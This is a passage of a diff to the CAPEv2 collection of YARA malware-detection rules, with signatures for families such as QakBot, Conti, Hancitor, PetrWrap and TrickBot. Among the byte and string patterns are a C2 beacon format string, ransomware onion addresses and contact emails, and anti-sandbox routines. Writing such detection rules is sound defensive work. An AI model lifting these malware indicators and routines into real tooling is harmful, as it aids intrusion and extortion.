"9375f59b56e47fd0b90b089afdf3be8f16f960038fc625523a2e2d5509ab099d" score = 75 quality = 70 tags = "FILE" - cape_type = "DridexV4 Payload" + cape_type = "Bazar Payload" strings: - $decrypt32 = {6A 40 58 3B C8 0F 4D C1 39 46 04 7D 50 53 57 8B F8 81 E7 3F 00 00 80 79 05 4F 83 CF C0 47 F7 DF 99 1B FF 83 E2 3F 03 C2 F7 DF C1 F8 06 03 F8 C1 E7 06 57} - $getproc32 = {81 FB ?? ?? ?? ?? 74 2D 8B CB E8 ?? ?? ?? ?? 85 C0 74 0C 8B C8 8B D7 E8 ?? ?? ?? ?? 5B 5F C3} - $getproc64 = {81 FB ?? ?? ?? ?? 75 04 33 C0 EB 2D 8B CB E8 ?? ?? ?? ?? 48 85 C0 75 17 8B CB E8 ?? ?? ?? ?? 84 C0 74 E5 8B CB E8 ?? ?? ?? ?? 48 85 C0 74 D9 8B D7 48 8B C8 E8 ?? ?? ?? ?? 48 8B 5C 24 30 48 83 C4 20 5F C3} - $bot_stub_32 = {8B 45 E? 8? [5-13] 8A 1C 0? [6-15] 05 FF 00 00 00 8B ?? F? 39 ?? 89 45 E? 72 D?} - $bot_stub_64 = {8B 44 24 ?? 89 C1 89 CA 4C 8B 05 [4] 4C 8B 4C 24 ?? 45 8A 14 11 83 E0 1F 89 C0 41 89 C3 47 2A 14 18 44 88 54 14} + $decode = {F7 E9 [0-2] C1 FA 0? 8B C2 C1 E8 1F 03 D0 6B C2 ?? 2B C8} + $rsa = {C7 00 52 53 41 33 48 8D 48 09 C7 40 04 00 08 00 00 4C 8D 05 [3] 00 C6 40 08 03 B8 09 00 00 00 [0-3] 48 8D 89 80 00 00 00 41 0F 10 00} condition: - uint16(0)==0x5A4D and any of them + uint16(0)==0x5A4D and 2 of them } -rule CAPE_Codoso : FILE +rule CAPE_Gootkit : FILE { meta: - description = "Codoso Payload" + description = "Gootkit Payload" author = "kevoreilly" - id = "4c3d8d77-ffa9-576d-bf88-7b5a1bfd1811" + id = "8935fd10-ac79-5196-80c2-fc8f2fe185b5" date = "2019-10-30" modified = "2019-10-30" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Codoso.yar#L1-L13" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "32c9ed2ac29e8905266977a9ee573a252442d96fb9ec97d88642180deceec3f8" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Gootkit.yar#L1-L11" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "26704b6b0adca51933fc9d5e097930320768fd0e9355dcefc725aee7775316e7" score = 75 quality = 70 tags = "FILE" - cape_type = "Codoso Payload" + cape_type = "Gootkit Payload" strings: - $a1 = "WHO_A_R_E_YOU?" - $a2 = "DUDE_AM_I_SHARP-3.14159265358979" - $a3 = "USERMODECMD" + $code1 = {C7 45 ?? ?? ?? 4? 00 C7 45 ?? ?? 10 40 00 C7 45 E? D8 ?? ?? 00 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 [1-2] 00 10 40 00 89 [5-6] 43 00 89 ?? ?? 68 E8 80 00 00 FF 15} condition: - uint16(0)==0x5A4D and ( all of ($a*)) + uint16(0)==0x5A4D and all of them } rule CAPE_Amadey : FILE { @@ -113225,8 +114997,8 @@ rule CAPE_Amadey : FILE date = "2023-09-04" modified = "2023-09-04" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Amadey.yar#L1-L14" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Amadey.yar#L1-L14" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" hash = "988258716d5296c1323303e8fe4efd7f4642c87bfdbe970fe9a3bb3f410f70a4" logic_hash = "38f710b422a3644c9f0f3e80ad9ff28ef02050368c651a6cc2ce8b152b67bf48" score = 75 @@ -113242,689 +115014,740 @@ rule CAPE_Amadey : FILE condition: uint16(0)==0x5A4D and 2 of them } -rule CAPE_Carbanak : FILE +rule CAPE_Hancitor : FILE { meta: - description = "Carnbanak Payload" - author = "enzok" - id = "e6d395d5-65ba-5efb-bcbc-c6d56a96f0c1" - date = "2024-03-18" - modified = "2024-03-18" + description = "Hancitor Payload" + author = "threathive" + id = "b4e9a26a-db00-5553-acc2-f35148b0ffd5" + date = "2020-10-20" + modified = "2020-10-20" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Carbanak.yar#L1-L14" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - hash = "c9c1b06cb9c9bd6fc4451f5e2847a1f9524bb2870d7bb6f0ee09b9dd4e3e4c84" - logic_hash = "8ed5ab07f1635dc7cdf296e86a71a0a99d0b2faef8fc460f43d426b24b8c8367" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Hancitor.yar#L1-L14" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "84003542a2f587b5fbd43731c4240759806f8ee46df2bd96aae4a3c09d97e41c" score = 75 quality = 70 tags = "FILE" - cape_type = "Carbanak Payload" + cape_type = "Hancitor Payload" strings: - $sboxinit = {0F BE 02 4? 8D 05 [-] 4? 8D 4D ?? E8 [3] 00 33 F6 4? 8D 5D ?? 4? 63 F8 8B 45 ?? B? B1 E3 14 06} - $decode_string = {0F BE 03 FF C9 83 F8 20 7D ?? B? 1F [3] 4? 8D 4A E2 EB ?? 3D 80 [3] 7D ?? B? 7F [3] 4? 8D 4A A1 EB ?? B? FF [3] 4? 8D 4A 81} - $constants = {0F B7 05 [3] 00 0F B7 1D [3] 00 83 25 [3] 00 00 89 05 [3] 00 0F B7 05 [3] 00 89 1D [3] 00 89 05 [3] 00 33 C0 4? 8D 4D} + $fmt_string = "GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)" + $fmt_string2 = "GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x32)" + $ipfy = "http://api.ipify.org" + $user_agent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko" condition: - uint16(0)==0x5A4D and 2 of them + uint16(0)==0x5A4D and all of them } -rule CAPE_Azorult : FILE +rule CAPE_Petrwrap : FILE { meta: - description = "Azorult Payload" + description = "PetrWrap Payload" author = "kevoreilly" - id = "ca76ec00-001f-56d0-bdbc-9dfd3239fba8" + id = "83762c87-6e96-50fe-b297-e1a5f893be43" date = "2022-06-09" modified = "2022-06-09" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Azorult.yar#L1-L12" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "4691cf48d513d1965416b0cce1b6e19c8f7b393a940afd68b7c6ca8c0d125d90" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/PetrWrap.yar#L1-L15" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "6dd1cf5639b63d0ab41b24080dad68d285f2e3969ad34fd724c83e7a0dd4b968" score = 75 quality = 70 tags = "FILE" - cape_type = "Azorult Payload" + cape_type = "PetrWrap Payload" strings: - $code1 = {C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 00 00 00 8D 85 80 F5 FF FF 89 47 2C C7 47 30 00 08 00 00 8D 85 80 F1 FF FF 89 47 34 C7 47 38 00 04 00 00 57 68 00 00 00 90} - $string1 = "SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),\"unixepoch\")" + $a1 = "http://petya3jxfp2f7g3i.onion/" + $a2 = "http://petya3sen7dyko2n.onion" + $b1 = "http://mischapuk6hyrn72.onion/" + $b2 = "http://mischa5xyix2mrhd.onion/" condition: - uint16(0)==0x5A4D and all of them + uint16(0)==0x5A4D and ( any of ($a*)) and ( any of ($b*)) } -rule CAPE_Dridexloader : FILE +rule CAPE_Seduploader : FILE { meta: - description = "Dridex v4 dropper C2 parsing function" + description = "Seduploader decrypt function" author = "kevoreilly" - id = "43bd9631-4611-567c-bee5-d926e060b977" - date = "2021-03-10" - modified = "2021-03-10" + id = "a7152d8c-a197-5784-8a6d-453d41585df1" + date = "2022-06-09" + modified = "2022-06-09" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/DridexLoader.yar#L1-L17" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "20696b1f14539c8ecf21bffc696596040c20b1ee2fcedc173945482c0baca588" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Seduploader.yar#L1-L11" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "d70c886699169d4dafc5b063c93682a34af5667df6d293b52256ddc19ab9c516" score = 75 quality = 70 tags = "FILE" - cape_type = "DridexLoader Payload" + cape_type = "Seduploader Payload" strings: - $c2parse_1 = {57 0F 95 C0 89 35 [4] 88 46 04 33 FF 80 3D [4] 00 76 54 8B 04 FD [4] 8D 4D EC 83 65 F4 00 89 45 EC 66 8B 04 FD [4] 66 89 45 F0 8D 45 F8 50} - $c2parse_2 = {89 45 00 0F B7 53 04 89 10 0F B6 4B 0C 83 F9 0A 7F 03 8A 53 0C 0F B6 53 0C 85 D2 7E B7 8D 74 24 0C C7 44 24 08 00 00 00 00 8D 04 7F 8D 8C 00} - $c2parse_3 = {89 08 66 39 1D [4] A1 [4] 0F 95 C1 88 48 04 80 3D [4] 0A 77 05 A0 [4] 80 3D [4] 00 56 8B F3 76 4E 66 8B 04 F5} - $c2parse_4 = {0F B7 C0 89 01 A0 [4] 3C 0A 77 ?? A0 [4] A0 [4] 57 33 FF 84 C0 74 ?? 56 BE} - $c2parse_5 = {0F B7 05 [4] 89 02 89 15 [4] 0F B6 15 [4] 83 FA 0A 7F 07 0F B6 05 [4] 0F B6 05 [4] 85 C0} - $c2parse_6 = {0F B7 53 ?? 89 10 0F B6 4B ?? 83 F9 0A 7F 03 8A 53 ?? 0F B6 53 ?? 85 D2 7E B9} + $decrypt1 = {8D 0C 30 C7 45 FC 0A 00 00 00 33 D2 F7 75 FC 8A 82 ?? ?? ?? ?? 32 04 0F 88 01 8B 45 0C 40 89 45 0C 3B C3 7C DB} condition: - uint16(0)==0x5A4D and any of them + uint16(0)==0x5A4D and any of ($decrypt*) } -rule CAPE_Masslogger : FILE +rule CAPE_Cryptoshield : FILE { meta: - description = "MassLogger" + description = "Cryptoshield Payload" author = "kevoreilly" - id = "0743421a-36f7-5b7c-859f-b461511151cb" - date = "2020-11-24" - modified = "2020-11-24" + id = "a7b60a0d-7d46-59c9-8273-ee23bae3fbbc" + date = "2019-10-30" + modified = "2019-10-30" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/MassLogger.yar#L1-L12" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "c8d82694810aafbdc6a35a661e7431e9536035e2f7fef90b9359064c4209b66c" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Cryptoshield.yar#L1-L13" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "46064b4c69cb1af01330c5d194ef50728e0f0479e9fbf72828822935f8e37ac6" score = 75 quality = 70 tags = "FILE" - cape_type = "MassLogger Payload" + cape_type = "Cryptoshield Payload" strings: - $name = "MassLogger" - $fody = "Costura" + $a1 = "CRYPTOSHIELD." wide + $a2 = "Click on Yes in the next window for restore work explorer" wide + $a3 = "r_sp@india.com - SUPPORT" condition: - uint16(0)==0x5A4D and 2 of them + uint16(0)==0x5A4D and ( all of ($a*)) } -rule CAPE_Rokrat : FILE +rule CAPE_Nettraveler : FILE { meta: - description = "RokRat Payload" + description = "NetTraveler Payload" author = "kevoreilly" - id = "12e05b90-9771-5901-ae82-9fd2ea6263e7" + id = "242e1c3f-5460-5393-9c07-cfab25860796" date = "2022-06-09" modified = "2022-06-09" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/RokRat.yar#L1-L12" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "2aaa7de7ccd59e0da690f4bc0c7deaacf61314d61f8d2aa3ce6f6892f50612ec" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/NetTraveler.yar#L1-L14" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "bf5026f1a1cb3d6986a29d22657a9f1904b362391a6715d7468f8f8aca351233" score = 75 quality = 70 tags = "FILE" - cape_type = "RokRat Payload" + cape_type = "NetTraveler Payload" strings: - $code1 = {8B 57 04 8D 7F 04 33 57 FC 81 E2 FF FF FF 7F 33 57 FC 8B C2 24 01 0F B6 C0 F7 D8 1B C0 D1 EA 25 DF B0 08 99 33 87 30 06 00 00 33 C2 89 87 3C F6 FF FF 83 E9 01 75 C9} - $string1 = "/pho_%s_%d.jpg" wide + $string1 = {4E 61 6D 65 3A 09 25 73 0D 0A 54 79 70 65 3A 09 25 73 0D 0A 53 65 72 76 65 72 3A 09 25 73 0D 0A} + $string2 = "Password Expiried Time:" + $string3 = "Memory: Total:%dMB,Left:%dMB (for %.2f%s)" condition: - uint16(0)==0x5A4D and ( any of ($code*)) and ( any of ($string*)) + uint16(0)==0x5A4D and all of them } -rule CAPE_Oyster +rule CAPE_Azer : FILE { meta: - description = "Oyster Payload" - author = "enzok" - id = "29443d00-e3de-53fd-b617-df470a30e805" - date = "2024-05-30" - modified = "2024-05-30" + description = "Azer Payload" + author = "kevoreilly" + id = "4bda70c2-3cd9-543f-92f4-886b7dd899a1" + date = "2019-10-30" + modified = "2019-10-30" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Oyster.yar#L1-L19" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - hash = "8bae0fa9f589cd434a689eebd7a1fde949cc09e6a65e1b56bb620998246a1650" - logic_hash = "23ab1518712dbce8319b87785d7ffc0c2b61de82c2bbf533ebf0aae39ec33540" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Azer.yar#L1-L13" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "48bd4a4e071f10d1911c4173a0cd39c69fed7a3b29eb92beffe709899f4cefa5" score = 75 quality = 70 - tags = "" - cape_type = "Oyster Payload" + tags = "FILE" + cape_type = "Azer Payload" strings: - $start_exit = {(05 | 00) 00 00 00 2E 96 1E A6} - $content_type = {F6 CE 56 F4 76 F6 96 2E 86 C6 96 36 0E 0E 86 04 5C A6 0E 9E 2A B4 2E 76 A6 2E 76 F6 C2} - $domain = {44 5C 44 76 96 86 B6 F6 26 44 34 44} - $id = {44 5C 44 64 96 44 DE} - $ip_local = {44 5C 44 36 86 C6 F6 36 FA 0E 96 44 34 44} - $table_part_1 = {00 80 40 C0 20 A0 60 E0 10 90 50 D0 30 B0 70 F0 08 88 48 C8 28 A8 68} - $table_part_2 = {97 57 D7 37 B7 77 F7 0F 8F 4F CF 2F AF 6F EF 1F 9F 5F DF 3F BF 7F FF} - $decode = {0F B6 0? 8D ?? FF 8A [2] 0F B6 80 [4] 88 04 ?? 46 0F B6 C? 0F B6 80 [4] 88 4? 01 3B F7} + $a1 = "webmafia@asia.com" wide + $a2 = "INTERESTING_INFORMACION_FOR_DECRYPT.TXT" wide + $a3 = "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQ" condition: - 4 of them + uint16(0)==0x5A4D and ( all of ($a*)) } -rule CAPE_Cryptoshield : FILE +rule CAPE_Qakbot5_1 : FILE { meta: - description = "Cryptoshield Payload" - author = "kevoreilly" - id = "a7b60a0d-7d46-59c9-8273-ee23bae3fbbc" - date = "2019-10-30" - modified = "2019-10-30" + description = "QakBot v5 Payload" + author = "kevoreilly, enzok" + id = "48866cdd-f60e-50b8-85f9-573710934b0b" + date = "2024-04-28" + modified = "2024-04-28" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Cryptoshield.yar#L1-L13" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "46064b4c69cb1af01330c5d194ef50728e0f0479e9fbf72828822935f8e37ac6" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/QakBot.yar#L1-L15" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + hash = "59559e97962e40a15adb2237c4d01cfead03623aff1725616caeaa5a8d273a35" + logic_hash = "cc23a92f45619d44af824128b743c259dd9dfa7cb5106932f3425f3dfd1dccdf" score = 75 quality = 70 tags = "FILE" - cape_type = "Cryptoshield Payload" + cape_type = "QakBot Payload" + packed = "f4bb0089dcf3629b1570fda839ef2f06c29cbf846c5134755d22d419015c8bd2" strings: - $a1 = "CRYPTOSHIELD." wide - $a2 = "Click on Yes in the next window for restore work explorer" wide - $a3 = "r_sp@india.com - SUPPORT" + $loop = {8B 75 ?? 48 8B 4C [2] FF 15 [4] 48 8B 4C [2] 48 8B 01 FF 50 ?? 8B DE 48 8B 4C [2] 48 85 C9 0F 85 [4] EB 4E} + $c2list = {0F B7 1D [4] B? [2] 00 00 E8 [4] 8B D3 4? 89 45 ?? 4? 33 C9 4? 8D 0D [4] 4? 8B C0 4? 8B F8 E8} + $campaign = {0F B7 1D [4] B? [2] 00 00 E8 [4] 8B D3 4? 89 44 24 ?? 4? 33 C9 4? 8D 0D [4] 4? 8B C0 4? 8B F8 E8} condition: - uint16(0)==0x5A4D and ( all of ($a*)) + uint16(0)==0x5A4D and 2 of them } -rule CAPE_Fareit : FILE +rule CAPE_Qakbot4_1 : FILE { meta: - description = "Fareit Payload" + description = "QakBot v4 Payload" author = "kevoreilly" - id = "b3c4eb86-d104-5f31-afa4-5bf5f370f64e" - date = "2022-06-09" - modified = "2022-06-09" + id = "d2c5316c-22cc-5b6d-b6a2-b1d23a06d16b" + date = "2024-04-28" + modified = "2024-04-28" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Fareit.yar#L1-L11" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "ed35391ffc949219f380da3f22bc8397a7d5c742bd68e227c3becdebcab5cf83" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/QakBot.yar#L17-L35" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "b2870e33abffbb3ff49b7891b0f5c538ab48ee63da5553929d4e37dec921344f" score = 75 quality = 70 tags = "FILE" - cape_type = "Fareit Payload" + cape_type = "QakBot Payload" strings: - $string1 = {0D 0A 09 09 0D 0A 0D 0A 09 20 20 20 3A 6B 74 6B 20 20 20 0D 0A 0D 0A 0D 0A 20 20 20 20 20 64 65 6C 20 20 20 20 09 20 25 31 20 20 0D 0A 09 69 66 20 20 09 09 20 65 78 69 73 74 20 09 20 20 20 25 31 20 20 09 20 20 67 6F 74 6F 20 09 0D 20 6B 74 6B 0D 0A 20 64 65 6C 20 09 20 20 25 30 20 00} + $crypto1 = {8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 C9 00 FF FF FF 41} + $sha1_1 = {5? 33 F? [0-9] 89 7? 24 ?? 89 7? 24 ?? 8? [1-3] 24 [1-4] C7 44 24 ?0 01 23 45 67 C7 44 24 ?4 89 AB CD EF C7 44 24 ?8 FE DC BA 98 C7 44 24 ?C 76 54 32 10 C7 44 24 ?0 F0 E1 D2 C3} + $sha1_2 = {33 C0 C7 01 01 23 45 67 89 41 14 89 41 18 89 41 5C C7 41 04 89 AB CD EF C7 41 08 FE DC BA 98 C7 41 0C 76 54 32 10 C7 41 10 F0 E1 D2 C3 89 41 60 89 41 64 C3} + $anti_sandbox1 = {8D 4? FC [0-1] E8 [4-7] E8 [4] 85 C0 7E (04|07) [4-7] 33 (C0|D2) 74 02 EB FA} + $anti_sandbox2 = {8D 45 ?? 50 E8 [2] 00 00 59 68 [4] FF 15 [4] 89 45 ?? 83 7D ?? 0F 76 0C} + $decrypt_config1 = {FF 37 83 C3 EC 53 8B 5D 0C 8D 43 14 50 6A 14 53 E8 ?? ?? ?? ?? 83 C4 14 85 C0 ?? 26 ?? ?? 86 20 02 00 00 66 85 C0 ?? ?? FF 37 FF 75 10 53} + $decrypt_config2 = {8B 45 08 8B 88 24 04 00 00 51 8B 55 10 83 EA 14 52 8B 45 0C 83 C0 14 50 6A 14 8B 4D 0C 51 E8 6C 08 00 00} + $decrypt_config3 = {6A 13 8B CE 8B C3 5A 8A 18 3A 19 75 05 40 41 4A 75 F5 0F B6 00 0F B6 09 2B C1 74 05 83 C8 FF EB 0E} + $call_decrypt = {83 7D ?? 00 56 74 0B FF 75 10 8B F3 E8 [4] 59 8B 45 0C 83 F8 28 72 19 8B 55 08 8B 37 8D 48 EC 6A 14 8D 42 14 52 E8} condition: - uint16(0)==0x5A4D and any of ($string*) + uint16(0)==0x5A4D and any of ($*) } -rule CAPE_Nemty : FILE +rule CAPE_Rhadamanthys_1 { meta: - description = "Nemty Ransomware Payload" + description = "Rhadamanthys Loader" author = "kevoreilly" - id = "3aa8e1d7-f9cb-5b04-923d-7bed15ab8c3f" - date = "2020-04-03" - modified = "2020-04-03" + id = "4683ef43-7397-5546-ae54-b4c000518182" + date = "2023-09-18" + modified = "2023-09-18" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Nemty.yar#L1-L13" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "a05974b561c67b4f1e0812639b74831edcf65686a06c0d380f0b45739e342419" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Rhadamanthys.yar#L1-L14" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "f71bee3ef1dd7b16a55397645d16c0a20d1fdd3bf662f241c0b11796629b11ff" score = 75 quality = 70 - tags = "FILE" - cape_type = "Nemty Payload" + tags = "" + cape_type = "Rhadamanthys Loader" strings: - $tordir = "TorDir" - $decrypt = "DECRYPT.txt" - $nemty = "NEMTY" + $rc4 = {88 4C 01 08 41 81 F9 00 01 00 00 7C F3 89 75 08 33 FF 8B 4D 08 3B 4D 10 72 04 83 65 08 00} + $code = {8B 4D FC 3B CF 8B C1 74 0D 83 78 04 02 74 1C 8B 40 1C 3B C7 75 F3 3B CF 8B C1 74 57 83 78 04 17 74 09 8B 40 1C 3B C7 75 F3 EB} + $conf = {46 BB FF 00 00 00 23 F3 0F B6 44 31 08 03 F8 23 FB 0F B6 5C 39 08 88 5C 31 08 88 44 39 08 02 C3 8B 5D 08 0F B6 C0 8A 44 08 08} + $cape_string = "cape_options" condition: - uint16(0)==0x5A4D and all of them + 2 of them and not $cape_string } -rule CAPE_Trickbot +rule CAPE_Conti : FILE { meta: - description = "TrickBot Payload" - author = "sysopfb & kevoreilly" - id = "dc88eadd-7b84-5bd0-96d1-aad480632bee" - date = "2023-02-07" - modified = "2023-02-07" + description = "Conti Ransomware" + author = "kevoreilly" + id = "c94aed07-0eaf-5b51-a81e-e1992543673a" + date = "2021-03-15" + modified = "2021-03-15" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/TrickBot.yar#L1-L20" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "47cc2070b43957601a72745329a9d14fb3fbfd4d2b31cacc35d4ac750dde31ea" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Conti.yar#L1-L13" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "c9842f93d012d0189b9c6f10ad558b37ae66226bbb619ad677f6906ccaf0e848" score = 75 quality = 70 - tags = "" - cape_type = "TrickBot Payload" + tags = "FILE" + cape_type = "Conti Payload" strings: - $str1 = "*" ascii wide - $str2 = "group_tag" ascii wide - $str3 = "client_id" ascii wide - $code1 = {8A 11 88 54 35 F8 46 41 4F 89 4D F0 83 FE 04 0F 85 7E 00 00 00 8A 1D ?? ?? ?? ?? 33 F6 8D 49 00 33 C9 84 DB 74 1F 8A 54 35 F8 8A C3 8D 64 24 00} - $code2 = {8B 4D FC 8A D1 02 D2 8A C5 C0 F8 04 02 D2 24 03 02 C2 88 45 08 8A 45 FE 8A D0 C0 FA 02 8A CD C0 E1 04 80 E2 0F 32 D1 8B 4D F8 C0 E0 06 02 45 FF 88 55 09 66 8B 55 08 66 89 11 88 41 02} - $code3 = {0F B6 54 24 49 0F B6 44 24 48 48 83 C6 03 C0 E0 02 0F B6 CA C0 E2 04 C0 F9 04 33 DB 80 E1 03 02 C8 88 4C 24 40 0F B6 4C 24 4A 0F B6 C1 C0 E1 06 02 4C 24 4B C0 F8 02 88 4C 24 42 24 0F} - $code4 = {53 8B 5C 24 18 55 8B 6C 24 10 56 8B 74 24 18 8D 9B 00 00 00 00 8B C1 33 D2 F7 F3 41 8A 04 2A 30 44 31 FF 3B CF 75 EE 5E 5D 5B 5F C3} - $code5 = {50 0F 31 C7 44 24 04 01 00 00 00 8D 0C C5 00 00 00 00 F7 C1 F8 07 00 00 74 1B 48 C1 E2 20 48 8B C8 48 0B CA 0F B6 C9 C1 E1 03 F7 D9 C1 64 24 04 10 FF C1 75 F7 59 C3} - $code6 = {53 8B 5C 24 0C 56 8B 74 24 14 B8 ?? ?? ?? ?? F7 E9 C1 FA 02 8B C2 C1 E8 1F 03 C2 6B C0 16 8B D1 2B D0 8A 04 1A 30 04 31 41 3B CF 75 DD 5E 5B 5F C3} - $code7 = {B8 ?? ?? 00 00 85 C9 74 32 BE ?? ?? ?? ?? BA ?? ?? ?? ?? BF ?? ?? ?? ?? BB ?? ?? ?? ?? 03 F2 8B 2B 83 C3 04 33 2F 83 C7 04 89 29 83 C1 04 3B DE 0F 43 DA} + $crypto1 = {8A 07 8D 7F 